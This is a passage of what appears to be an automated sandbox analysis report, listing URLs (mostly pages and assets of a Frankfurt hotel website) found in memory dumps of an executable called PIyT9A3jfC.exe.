                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gpthink.com/product/202.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gpthink.com/product/204.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/area/start/start.css
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/css/editor.css
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/css/global.css
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/css/iBox.css
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/css/style.css
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/de
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/de/content/17/~nm.22/Konferenzen.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/de/content/2/~nm.12/Hotel.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/de/news/detail/~id.11/Quicklunch.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/de/news/detail/~id.12/Arrangements-so-individuell-wie-Sie.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/de/news/detail/~id.30/Romantik-Arrangement.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/de/news/detail/~id.46/Brunch-Termine-2013.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/de/news/detail/~id.53/1.-Wunsch-Brunch-im-Hotel-AMADEUS.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/de/termine/detail/~id.18/IAA-2013-Zukunft-serienmaessig.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/de/termine/detail/~id.19/BMW-Frankfurt-Marathon.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/de/termine/detail/~id.20/Buchmesse-2013.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/de/termine/detail/~id.22/Museumsuferfest-2013-23.-25.08.2013.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/de/termine/detail/~id.4/Women-s-Run-Frankfurt-2013.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/de/termine/detail/~id.6/IRONMAN-2013.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/dynamic/feeds/news/news-atom-1.0-de.xml
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/dynamic/feeds/news/news-rss-2.0-de.xml
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/en
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/es
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/fonts/DejaVu-Sans/stylesheet.css
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/fonts/DejaVu-Serif/stylesheet.css
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/fonts/OpenSans/stylesheet.css
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/fonts/Roboto/stylesheet.css
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/images/content/favicon.ico
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/images/content/kk.logos.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/images/content/logo.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/images/icons/loading.gif
                  Source: PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/images/layout/rootnav_separator.gif
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/images/layout/trans1x1.gif
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/js/anchor.class.js
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/js/base64.js
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/js/form.class.js
